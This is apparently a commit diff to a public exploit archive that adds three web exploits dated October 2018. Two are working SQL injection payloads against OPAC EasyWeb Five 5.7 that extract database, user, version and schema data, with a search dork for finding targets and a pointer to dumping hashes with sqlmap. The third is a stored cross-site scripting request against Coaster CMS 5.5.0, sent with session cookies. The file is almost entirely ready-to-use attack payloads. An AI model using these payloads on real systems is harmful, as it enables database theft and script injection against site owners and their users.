DB: 2018-10-03

3 changes to exploits/shellcodes OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection Coaster CMS 5.5.0 - Cross-Site Scripting OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
2018-10-03 05:01:58 +00:00 · 2018-10-03 05:01:58 +00:00 · 053cc17c77
commit 053cc17c77
parent 716ece3cc6
4 changed files with 193 additions and 0 deletions
--- a/exploits/php/webapps/45518.txt
+++ b/exploits/php/webapps/45518.txt
@ -0,0 +1,21 @@
+# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
+# Dork: inurl:"index.php?scelta=campi"
+# Date: 2018-10-02
+# Exploit Author: Dino Barlattani
+# Vendor Homepage: http://www.nexusfi.it/
+# Software Link: http://www.nexusfi.it/easyweb.php
+# Version: 5.7
+# Category: Webapps
+# Platform: PHP
+# CVE: N/A
+
+# POC:
+# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=
+
+# You can use sqlmap for dump entire database and dumping hash
+
+scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
+COUNT(*),CONCAT(0x7176627a71,(SELECT
+(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
+SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
+'CrYc'='CrYc&lang=
--- a/exploits/php/webapps/45519.txt
+++ b/exploits/php/webapps/45519.txt
@ -0,0 +1,147 @@
+# Exploit Title: Coaster CMS 5.5.0 - Cross-Site Scripting
+# Date: 2018-10-01
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.web-feet.co.uk/
+# Software Link : https://github.com/Web-Feet/coastercms
+# Software : Coaster CMS
+# Product Version: v5.5.0
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# A Stored XSS vulnerability has been discovered in the v5.5.0 version of the Coaster CMS product.
+
+# HTTP POST Request :
+
+POST /admin/pages/edit/26 HTTP/1.1
+Host: demo.coastercms.org
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://demo.coastercms.org/admin/pages/edit/26
+Content-Type: multipart/form-data; boundary=---------------------------24464570528145
+Content-Length: 3353
+Cookie: __cfduid=ddc0ae999f19fa783083ea0c7fdce0ba41538397617; XSRF-TOKEN=eyJpdiI6IndLeTBrZVwvWkdzUE9JSTArU3FOQ3BRPT0iLCJ2YWx1ZSI6InlsZ3Jib0ZNQTM3TXZEZGlwd0hJZmg1aHRibGZDWHZTcmordkRKbnRHWVVjYUJ4TlFOSGdYNkFIWHBSdlozUlY1c3ZJQjNuek9tOW92WXE5SkloOHZ3PT0iLCJtYWMiOiI0MzkzZjU1YWNiNDU2MDhkMDVhMDMwZDkwZTNhZjc4NGI5YzMzZjk0N2Q4YmJmYzY3NWZlZjg1MzVjYTJmMWY2In0%3D; laravel_session=eyJpdiI6IkNhM0Roc280SjE2aFcweXlcLzZwR2hRPT0iLCJ2YWx1ZSI6IldoUG9xTnNqRjh2TlBrQW51NlhqU1hCa3NIZmhSczFlYWE5Mkxza3dMWThkbFZcL2E1VmVTRExCa3h2ckMrdDliajZSTjRSUnhQcEJiek1pSjZ6VGRyZz09IiwibWFjIjoiMmQ0YjBkMmY1NDQ4ODdjOWVhZWUyMDFkY2UwMTlkNTM4ZmEyMGE4YjAwMDVkYmQ3ODZiZWUyOWM4OWQzODg4ZSJ9
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="_token"
+
+ZeLPiM6IJlkjRf0tosDFjMNPOXVsPv5YioF6092P
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[19]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[20]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[21]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[34]"
+
+Search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[36]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[33]"
+
+<p>"><img src=x onerror=alert("ismailtasdelen")>
+<script>alert("Ismail Tasdelen")</script>
+</p>
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[1][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[1][select]"
+
+posts
+-----------------------------24464570528145
+Content-Disposition: form-data; name="publish"
+
+publish
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[35][source]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[35][alt]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[parent]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_lang[name]"
+
+Search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_lang[url]"
+
+search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[link]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_other[group_radio]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[group_container]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[group_container_url_priority]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[template][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[template][select]"
+
+3
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live][select]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live_start]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live_end]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[sitemap][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[sitemap][select]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="versionFrom"
+
+4
+-----------------------------24464570528145
+Content-Disposition: form-data; name="duplicate"
+
+0
+-----------------------------24464570528145--
--- a/exploits/php/webapps/45521.txt
+++ b/exploits/php/webapps/45521.txt
@ -0,0 +1,22 @@
+# Exploit Title: OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
+# Dork: N/A
+# Exploit Author: Ihsan Sencan
+# Date: 2018-10-02
+# Vendor Homepage: http://www.nexusfi.it/
+# Software Link: http://www.nexusfi.it/easyweb.php
+# Version: 5.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# POST /easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008 HTTP/1.1
+
+nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+ 
+nome=') AND ROW(3,6)>(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM (SELECT 66 UNION SELECT 7030 UNION SELECT 4751 UNION SELECT 1310)a GROUP BY x)-- Efe
+
+
+http://Target/easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008
+nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40057,3 +40057,6 @@ id,file,description,date,author,type,platform,port
 45513,exploits/php/webapps/45513.txt,"Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
 45514,exploits/php/webapps/45514.txt,"WUZHICMS 2.0 - Cross-Site Scripting",2018-10-01,Renzi,webapps,php,
 45515,exploits/hardware/webapps/45515.txt,"Billion ADSL Router 400G 20151105641 - Cross-Site Scripting",2018-10-01,cakes,webapps,hardware,
+45518,exploits/php/webapps/45518.txt,"OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection",2018-10-02,"Dino Barlattani",webapps,php,
+45519,exploits/php/webapps/45519.txt,"Coaster CMS 5.5.0 - Cross-Site Scripting",2018-10-02,"Ismail Tasdelen",webapps,php,
+45521,exploits/php/webapps/45521.txt,"OPAC EasyWeb Five 5.7 - 'nome' SQL Injection",2018-10-02,"Ihsan Sencan",webapps,php,